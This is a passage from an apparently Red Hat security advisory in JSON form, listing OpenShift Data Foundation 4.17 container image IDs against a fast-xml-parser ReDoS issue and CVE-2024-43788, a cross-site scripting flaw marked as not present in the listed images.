"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "fast-xml-parser: ReDOS at currency parsing in currency.js", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", 